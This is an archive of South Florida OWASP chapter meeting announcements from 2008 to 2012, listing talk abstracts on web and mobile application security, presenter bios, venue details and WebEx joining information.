Mobile frameworks are being used for cross-platform development and to ease development efforts in producing applications for iOS/Android/Blackberry devices. In this talk we observe bad development practices and expose some issues found in open source frameworks, notably Apache Cordova (previously known as "PhoneGap").

Presenter Bio: Claudio J. Lacayo causes 500 response errors in web applications and is currently evangelizing the use of native code over frameworks.

Please vote on our new poll and let us know what future topics you would like to see presented at our meetings this year : http://www.linkedin.com/groupItem?view=&gid=2462364&type=member&item=101892186&qid=641ae738-dc10-48a0-8eaa-64b664bf99f2&trk=group_most_popular-0-b-ttl&goback=.gmp_2462364

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Knight Lecture Hall (Room 1124) 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs.

Wednesday, April 25, 2012 - 5:00pm - South Florida OWASP Meeting - Two great talks and networking after

Join us for our February meeting where in alignment with our previous announcement, we will have two great talks. Please note that food and drink after the meeting will also be sponsored by DBNetworks and OWASP.

Talk 1: How is static analysis is like hunting foxes in the forest?

A brief guide to tools assisted secure code review. Includes a discussion of challenges and recommendations to make your work in static analysis and secure code review more effective.

Presenter Bio: Sean Matthiesen is a Senior Consultant at Cigital, Inc. His expertise is in software development, secure code review, and static code analysis. Sean has provided consulting services to several large commercial clients and has been involved in the development of many mission critical software applications. Over the last 22 years, he has worked as a developer in multiple programming languages, including C++ and Java.

Prior to joining Cigital, Inc., Sean built and managed the static analysis team at a fortune 500 company where he was responsible for all aspects of secure software development including security awareness training, static analysis tool support, secure code review, security architecture review, and software security audits. He has trained over 500 developers on the use of Secure Application Development using IBM Rational AppScan Source, 250 developers on secure software development, and contributed to multiple online CBTs courses. Sean has over 5 years of hands on experience using the Ounce/AppScan Source product. He holds a B.S. in Computer Science from Principia College.

Talk 2: SQL Injection

New reports of SQL injection attacks, on corporate databases, are appearing almost weekly. Applications free from vulnerabilities are always the best defense, but a better backstop is clearly needed since existing solutions are unable to defend against this threat. DBNetworks will present its vision for a future technology which will protect against new and unique SQL injection attacks in real-time.

Presenter Bio: Prior to coming on board at DBNetworks as the Director of Systems Engineering, Stuart Hancock was the Enterprise Cloud Program Manager at Cisco Systems; prior to that, he held positions at Cisco as a consulting engineer and HPC architect, and has worked in the past for a number of startups, as well as EMC, IPivot (acquired by Intel for $500M), Intel, and Wang Laboratories.

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs.

'''Thursday. February 23, 2012 - 5:00pm - South Florida OWASP Meeting - Two great talks and networking after'''

Join us for our February meeting where in alignment with our previous announcement, we will have two great talks. Please note that food and drink after the meeting will also be sponsored by WhiteHat.

Talk 1: Future of Cross Site Scripting defenses

This talk will discuss the past methods used for cross-site scripting (XSS) defense that were only partially effective. Learning from these lessons, we will also discuss present day defensive methodologies that are effective, but place an undue burden on the developer. We will then finish with a discussion of future XSS defense mythologies that shift the burden of XSS defense from the developer to various frameworks. These include auto-escaping template technologies, browser-based defenses such as Content Security Policy, and Javascript sandboxes such as the Google CAJA project and JSReg.

Presenter Bio: Jim Manico is the VP of Security Architecture for WhiteHat Security, a web security firm. Jim is a participant and project manager of the OWASP Developer Cheatsheet series. He is also the producer and host of the OWASP Podcast Series.

[[Media:OWASP_April_2012.pdf]]

Talk 2:Holiday Downtime, It wasn't just you!

During the holiday season, two researchers in Germany introduced the world to a severe denials of service attack during the 28th Chaos Computer Congress in Berlin on December 28, 2011. This vulnerability affects most web application platforms including ASP.NET, Java, and PHP to name a few. In this presentation, Chris will discuss and demo a working proof of concept of this DoS attack.

Presenter Bio: Christopher Zavala is a native of South Florida and is currently a Web App Pen Tester for Citigroup. A graduate of FIU and as an employee from small business’ to Large corporations; he is very diverse in both his technical and business mindset.

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs.

'''Tuesday. November 29, 2011 - 6:00pm - South Florida OWASP Meeting - Introduction to Mobile Challenges and Procedures'''

Join us for our November meeting where Brent Williams and Michael Patterson will present on Introduction to Mobile Challenges and Procedures: Reversing Android, iOS, Blackberry.

Presenter Bio:

Brent Williams is currently CTO at Equifax/Anakam Identity. In the past he has worked in business development for Homeland Security at SRA International. He obtained his degree from John Hopkins University.

Michael Patterson is the Founder of InAuth, Inc, a company that offers next generation solutions for mobile device security. He is the author of 18 provisional patents related to mobile authentication and fraud detection. He founded SMobile, Inc. which sold to Juniper in 2010.

[[Media:OWASP_mobile_Nov_2011.pdf]]

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs.

'''Wed. September 28, 2011 - 6:00pm - South Florida OWASP Meeting - Secure Application Development'''

Join us for our September meeting where Rohini Sulatycki will present on Secure Application Development. The talk will cover the following topics.

*  Current Landscape *  Why do security vulnerabilities  occur? *  Design *  Design Patterns *  Threat Modeling *  Development *  OWASP Top 10 *  Testing *  Penetration Testing *  Configuration *  Maintenance

Presenter Bio: Rohini Sulatycki is a Senior Security Consultant within the Application Security practice at Trustwave's SpiderLabs. SpiderLabs is the advanced security team responsible for Penetration Testing, Application Security, Incident Response, and Payment Application testing for Trustwave's clients. Rohini has been involved in the Information Technology industry for more than 15 years. Rohini specializes in application security testing, code reviews and secure software development conducting a large number of application tests in her capacity at Trustwave. She has strong foundations in software engineering, design and architecture and implementing enterprise applications. Rohini has a background implementing and reviewing all types of applications, from traditional client/server applications to web applications and web services. Rohini has served as the president of the Kansas City OWASP chapter and a member of the High Technology Crime Investigation Association (HTCIA). She has been a technical reviewer for several books and publications including Java Security and IEEE Security and Privacy. She has also presented at various industry events including Black Hat and OWASP FROC on topics such as Web application security, Ajax security concerns and Flash application security. 

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682)

'Wed. Aug 31, 2011 - 6:00pm - South Florida OWASP Meeting - Blackhat/ Defcon Recap - All you wanted to know and everything you missed'

Join us for our August meeting where we will be discussing the latest news, tools and other hacking techniques displayed at Blackhat/ Defcon conferences this year.

If you were unable to make the cons this year, this is a good way to catch up on the most important talks. If you had trouble getting in to a talk or were still nursing that hangover and missed your favorite presentation, this will catch you up. This will also be a good time to reminisce about the Defcon Open CTF and the cons in general.

Presenter Bio:

Claudio Lacayo is a local security researcher currently involved in the financial industry.

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1048-1049 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs.

'Wed. July 27, 2011 - 6:00pm - South Florida OWASP Meeting - Double Feature - SQLMap 0.9 Overview and Analysis + Automated Scanning and Differential Reporting'

Join us for our July meeting where we will be discussing the latest release of one of the most formidable web application attack tools currently available: SQLMap0.9

The meeting will discuss some basic methods of SQL injection vulnerability identification (both error based and blind), and will go over ways to use the SQLMap0.9 tool to test your web application. Futhermore, we will discuss some of the more advanced features of SQLMap that were unavailable in previous releases.

Presenter Bio: Alexander Heid - is a local security researcher and board member of Hackmiami and co-chair of South Florida OWASP. Heid is also employed within the financial industry as a web application vulnerability analyst.

Automated Scanning and Differential Reporting

Companies are struggling with scaling source code scanning, there are not enough security experts to fulfill the current demand. Developers are being overwhelmed with the quantity and quality of issues reported from misconfigured scanning tools. This session will present an automated source code scanning deployment methodology that allows organizations to automatically reduce false positives during scanning and deliver reports that represent the high confidence security risk of the latest software changes.

What will your audience walk away with? 1) Establishment of security policies is key to reducing false positives 2) Automated scanning is easy to configure and requires limited maintenance 3) Differential reporting reduces developer overload by highlighting the risk of recent change

Presenter Bio:

Bruce Mayhew is a Security Solutions Architect at IBM. Bruce has over 20 years of software development experience with the last 13 years focused on application security. At IBM, he is frequently a project lead for application security assessments. Bruce has created an application security practice and training curriculum for large financial institutions and has been a Web Application Security Course instructor for the SANS Institute. Bruce is on the SANS Council for Secure Java Programming and is an author of the SANS GSSP Secure Programming Assessment. He is the primary author of WebGoat and was instrumental in bringing WebGoat to OWASP and currently leads the OWASP WebGoat project. A frequent speaker on application security topics, Bruce has presented at OWASP, NASA, ISSA, NSA, Innovate and many commercial and financial institutions.

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs.

'''Thurs. March 17, 2011 - 3:30pm - South Florida OWASP Meeting + ISSA Meeting'''

South Florida OWASP is teaming up with South Florida ISSA to bring you a very special St. Patricks Day meeting. There will be an after-party sponsored by Barracuda in Boca. We will have two great talks: Edward Bonver from Symantec will speak on Threat Modeling followed by Grant Murphy from Barracuda presenting their latest research: The State of Web Application Security. This meeting will be held from 3:30pm - 5:30pm at NCCI Holdings, Inc in Boca Raton and the party, sponsored by Barracuda, will be at the Dubliner. NCCI Holdings 901 Peninsula Corporate Cir Boca Raton, FL 33487-1362 Dubliner 435 Plaza Real Boca Raton, FL Talk: Threat Modeling Threat Modeling is one of the most important security activities that a development/QA team needs to perform as part of a Security Development Lifecycle. This activity allows the team to build a complete security profile of the system being built. Threat Modeling is not always easy to get going for a team that has little or no security experience. In this presentation we'll take a look at why Threat Modeling is so important; we'll explore the process behind it, and how the process is being implemented and followed across Symantec. Bio: Edward Bonver - Software Engineer, Symantec Edward Bonver is a principal software engineer on the product security team under the Office of the CTO at Symantec Corporation. In this capacity, Edward is responsible for working with software developers and quality assurance (QA) professionals across Symantec to continuously enhance the company's software security practices through the adoption of methodologies, procedures and tools for secure coding and security testing. Within Symantec, Edward teaches secure coding and security testing classes for Symantec engineers, and also leads the company's QA Security Task Force, which he founded. Prior to joining Symantec, Edward held software engineering and QA roles at Digital Equipment Corporation, Nbase and Zuma Networks. Edward is a Certified Information Systems Security Professional (CISSP) and a Certified Secure Software Lifecycle Professional (CSSLP). He holds a master's degree in computer science from California State University, Northridge, and a bachelor's degree in computer science from Rochester Institute of Technology. Edward is a Ph.D. student at NOVA Southeastern University. Talk: The State of Web Application Security It's no secret that more and more commerce is being conducted via Web applications. Web-based applications are convenient for consumers and allow vendors to get applications online quickly to reach those consumers. This trend has also created a variety of privacy and security concerns that affect all companies transacting business over the Web. Recently, Barracuda networks co-sponsored a research study conducted by the Ponemon Institute titled "The State of Web Application Security" that revealed that these concerns are keenly felt by web application administrators. However, a major disconnect exists as appropriate countermeasures to these threats are either ineffective or completely non-existent. Join us for an informative seminar to learn:

More about our revealing research,

Why Web applications are under attack,

What hackers are doing to compromise Web applications

How to mitigate this risk.

Bio: Grant Murphy, Vice President of Enterprise Solutions, Barracuda Networks Grant Murphy is Vice President of Enterprise Solutions managing worldwide sales for the Barracuda Web Application Firewall and the Web Filtering products at Barracuda Networks. Murphy brings significant experience in the Web proxy/cache market and how these technologies can be used to secure employee's Internet Access as well as the sites they are accessing. He has been a frequent speaker at many security industry events worldwide over the past four years. Prior to joining Barracuda, he was responsible for sales of McAfee's Web and Email filtering products. Murphy earned his CISSP accreditation in March of 2006. Pre-Registration Seating is limited so you must pre-register for the event. You can pre-register for the event here. FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an ISSA Meeting? If you are a CISSP and you provide your CISSP number at registration, we will submit your CPE credits automatically for you.

'''Wed. February 23, 2011 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm Building a Web Application Attack Framework Miguel Turner will be discussing the challenges involved in building a tool to support vulnerability analysts with the automated detection and exploitation of Web application vulnerabilities. Bio: Bio: Miguel Turner currently works for Immunity as a developer, and has worked internationally on a number of endeavors. His current focus and research is on automatic exploitation of Web applications.

'''Wed. December 1, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 3032/3034 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm Attacking web applications via XSS with BEeF and Metasploit Join us as Rod Soto presents a method of gaining administrative access to a domain controller through the exploitation of a DOM XSS vulnerability in a web application. The talk serves to demonstrate the risks that are posed through client side exploitation. Bio: Rod Soto is a vulnerability analyst and local security researcher. He is also a consultant to businesses around the globe regarding enterprise security matters. '''Wed. October 6, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm Abstract: Improving application security with ESAPI Swingset The primary aim of the OWASP Top 10 is to educate developers, designers, architects and organisations about the consequences of the most important web application security weaknesses. ESAPI is Enterprise security API's for remediation of OWASP Top 10 vulnerabilities. The ESAPI libraries are designed to make it easier for programmers to retrofit security into existing applications. The ESAPI Swingset is a web application which demonstrates common security vulnerabilities and asks users to secure the application against these vulnerabilities using the ESAPI libraries. The application is intended for Java Developers. The goal of the application is to teach developers about the functionality of the ESAPI libraries and give users a practical understanding of how it can be used to protect web applications against common security vulnerabilities. Bio: Fabio is currently working as an Information Security Specialist at AIB Bank (Dublin, Ireland). His tasks include performing risk analysis, assessing the security of web applications developed internally or purchased from third parties, define policies and standards on secure coding, as well as providing training on web application security to developers, auditors, executives and security professionals. Prior to joining AIB, he worked as a Security Engineer at Symantec Security Response European Headquarters analyzing malicious code, blended threats, security risks and vulnerabilities in various applications. Before moving to Ireland, he worked in the development of different training programs and activities with emphasis on secure software development in his native Argentina. <br As a member of the OWASP organization, Fabio is part of Global Education Committee whose mission is to provide training and educational services to businesses, governments and educational institutions on application security, he coordinates international conferences around this topic, and since early 2010 has been appointed chairman of OWASP Chapter in Ireland. Fabio is a graduate in Computer Engineering from the Universidad Católica Argentina and has been granted the CISSP by (ISC) 2 back in 2006.

'''Wed. August 25, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm This meeting's presentation is entitled "PCI Fundamentals" The talk will discuss the PCI compliance process, requirements, and implementations for everything from networks to web applications. The talk will be presented by Ivan Moskowitz.

Presenter Bios:

Ivan Moskowitz is a local security researcher and compliance auditor at a Fortune 100 firm.

'''Wed. July 28, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm This meeting's presentation is entitled "Citrix Vulnerabilities." The talk will discuss the architecture of a Citrix server, as well as the vulnerabilities that exist within various configuration settings. The talk will be presented by Adam Cazzolla and Dickson Kwong.

Presenter Bios:

Adam Cazzolla and Dickson Kwong are local security researchers and web application vulnerability analysts at a Fortune 20 firm.

'''Wed. June 23, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm This meeting's presentation is "Defensive Web Application Development" and "Modern Digital Crime Tools and Techniques"

This next OWASP meeting will feature two talks that are scheduled to be presented at the upcoming 2600 Hackers On Planet Earth conference (http://www.hope.net) in New York City. We will be featuring a sneak-peek preview of these talks on June 23, 2010 at the Nova campus.

"Defensive Web Application Development" by Pete Greko and Fabian Rothschild

This talk will examine various methods of code obfuscation for web application development. The goal is to make the tracking of covertly logged data too difficult for the average attacker to bother with.

"Modern Digital Crime Tools and Techniques" by Alexander Heid

This talk will examine the latest developments of tools and trends within the world of digital crimes. The talk will go over updates, developments, and plugins of new Zeus trojan variants, and will also examine new versions of various exploit kits used to distruibute malicious payloads. An overview of the digital crime lifecycle will be discussed as well.

Presenter Bios:

Pete Greko - is a local security researcher and board member of HackMiami. Greko is employed within the financial industry as a web application vulnerability analyst.

Alexander Heid - is a local security researcher and board member of Hackmiami and co-chair of South Florida OWASP. Heid is also employed within the financial industry as a web application vulnerability analyst.

Fabian Rothschild - is a local security researcher and member of HackMiami. Rothschild is employed as an security consultant for various clients around South Florida.

'''Wed. May 26, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 3032/3034 located on the 3rd floor, Eastside of the Carl DeSantis Building 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm This meeting's presentation is "PCI Compliance Fundamentals" by Georgios Mortakis of Enterprise Risk Management, Inc.

The presentation will go over application development to ensure PCI compliance, specifically developing applications to defeat the use of magnetic stripe skimmers. There will be live demonstrations taking place with a magnetic stripe skimmer showing ways to defeat the interception of important data.

Presenter Bio:

Georgios Mortakis (CISSP, CISA, QSA) is a Director of Information Systems Security with Enterprise Risk Management, Inc. Enterprise Risk Management, Inc, found in Miami FL in 1998, offers a wide variety of information security and information systems audit services to local, national (Fortune 500) and international businesses. [[Media:South_Florida_OWASP_May_2010_Card_Skimming_Demo.pdf]]

'''Wed. April 28th, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 3049/3051 located on the 3rd floor, Eastside of the Carl DeSantis Building 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm This meeting's presentation is "Cisco ACE Web Application Firewall Use Cases" by Rob Kinnion and Vikas Deolaliker.

The presentation will give a overview of the WAF market and the real world deployments and customer concerns which will help OWASP evolve the WAF as a product category. This event will also be available during a live WebEx feed. Details are below.

Presenter Bios:

Rob Kinnon has been a Systems Engineer for 10-years at Cisco. He has held the coveted CCIE many years before most people even heard of it. He is one of the most highly respected and formidable Cisco Security engineers within the region. Rob specializes in Cisco Security Architecture in NAC, Intrusion Prevention, Security Monitoring, and Log Correlation just to name a few. Rob has helped countless organizations protect and secure their networks.

Vikas Deolaliker is a Product Manager in DCASBU at Cisco for Cisco WAF. He has helped define and product manage a broad spectrum of products for the datacenter including: SOA Appliances, SAN Director Class Switches, Grid Computing Middleware, Java Enterprise Software. WebEx Live Session Information:

Meeting Number: 201 076 756

Meeting Password: Cisco

To start this meeting

1. Go to https://cisco.webex.com/cisco/j.php?S=201076756

2. Log in to your account.

3. Click "Start Now".

4. Follow the instructions that appear on your screen.

ALERT:Toll-Free Dial Restrictions for (408) and (919) Area Codes

The affected toll free numbers are: (866) 432-9903 for the San Jose/Milpitas area and (866) 349-3520 for the RTP area.

Please dial the local access number for your area from the list below:

- San Jose/Milpitas (408) area:  525-6800 - RTP (919) area:  392-3330

To join the teleconference only

1. Dial into Cisco WebEx (view all Global Access Numbers at

http://cisco.com/en/US/about/doing_business/conferencing/index.html

2. Follow the prompts to enter the Meeting Number (listed above) or Access Code followed by the # sign.

San Jose, CA: +1.408.525.6800 RTP: +1.919.392.3330

US/Canada: +1.866.432.9903 United Kingdom: +44.20.8824.0117

India: +91.80.4350.1111 Germany: +49.619.6773.9002

Japan: +81.3.5763.9394 China: +86.10.8515.5666

http://www.webex.com

IMPORTANT NOTICE: This WebEx service includes a feature that allows audio and any documents and other materials exchanged or viewed during the session to be recorded. By joining this session, you automatically consent to such recordings. If you do not consent to the recording, do not join the session.

'''Wed. March 31st, 2010 - 6pm - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Knight Lecture Hall - Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) 6pm This meeting's presentation is "Adon't be an Adobe victim: An overview of how recent Adobe-related flaws affect your web application" by Josh Stabiner.

The talk will examine the threats posed by PDF and Flash vulnerabilities to web applications and their users, and will examine ways to mitigate the potential threats to your organization.

Presenter Bio:

Josh Stabiner is a manager in Ernst &amp; Young's Advanced Security Center specializing in attack and penetration advisory services. He manages and executes assessments of web applications, external, internal and wireless networks, as well as physical security and social engineering. [[Media:South_Florida_OWASP_Adobe_ASC_Demo.pdf]] '''Wed. Jan 27th, 2010 - 6pm- South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Knight Lecture Hall, Room 1124 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) This meeting's presentation is "Zeus &amp; You: Analysis of the underground's most popular trojan" by Alexander Heid and Fabian Rothschild. [[Media:OWASP_miami_Zeus_and_You_01-2010.pdf]] '''Wed. Oct. 7th, 2009 6PM - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus 2nd Floor - Room 2071 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) This meeting's presentation is by Gary Bahadur and will be based on the presentation he is giving at Hacker Halted on the topic of Supplier Risk Management with more of a web focus.

'''Thu. Aug 20th, 2009 3:30PM - South Florida OWASP Meeting'''

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus 1st Floor - Room 1048/1049 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682) This meeting's presentation is "Security in .NET Applications &amp; Integrating Security in the Software Development Lifecycle" by Jon Arce. This is a joint meeting that has been arranged graciously by the local ISSA chapter (www.sfissa.org). [[Media:OWASP_miami_Integrating_Security_in_App_Dev_v1_1-2009_08.pptx]] [[Media:OWASP_miami_App_Security_Using_dotNET_Framework_v1_0-2009_08.pptx]]

'''Tue. June 30th, 2009 6:00PM - South Florida OWASP Meeting'''

Facility Location: Mission Critical Systems, Inc. 1347 East Sample Road, Suite 3 Pompano Beach, Fl 33064 Phone: (954) 788-7110 This meeting's presentation is "Risk Rating Models for Vulnerabilities" by Rishikesh Pande. [[Media:OWASP_miami_Risk_Modeling_v2-2009_06.pdf]]

'''Fri. April 3rd, 2009 6:00PM - South Florida OWASP Meeting'''

Facility Location: Immunity, Inc. 1247 Alton Road Miami Beach, FL 33139 Phone: (212) 534-0857 This meeting's presentation is "Memory Corruption and Buffer Overflows" by Dave Aitel. Dave presented on this topic during the OWASP NYC AppSec 2008 Conference. The presentation will also include some web application content based on Immunity's recent project experiences. [[Media:OWASP_miami_Corruption-2009_04.pdf]]

'''Wed. February 4th, 2009 5:00PM - South Florida OWASP Meeting'''

Facility Location: Mission Critical Systems, Inc. 1347 East Sample Road, Suite 3 Pompano Beach, Fl 33064 Phone: (954) 788-7110 This meeting's presentation is "An Architect's view of Application Security" by Rick Carlin. [[Media:OWASP_miami_Architect%E2%80%99s_View_of_Application_Security-2009_02.ppt]]

'''Wed. December 3rd, 2008 5:00PM - South Florida OWASP Meeting'''

Facility Location: Mission Critical Systems, Inc. 1347 East Sample Road, Suite 3 Pompano Beach, Fl 33064 Phone: (954) 788-7110 This meeting's presentation is a live web hacking demo by Dan Carcone.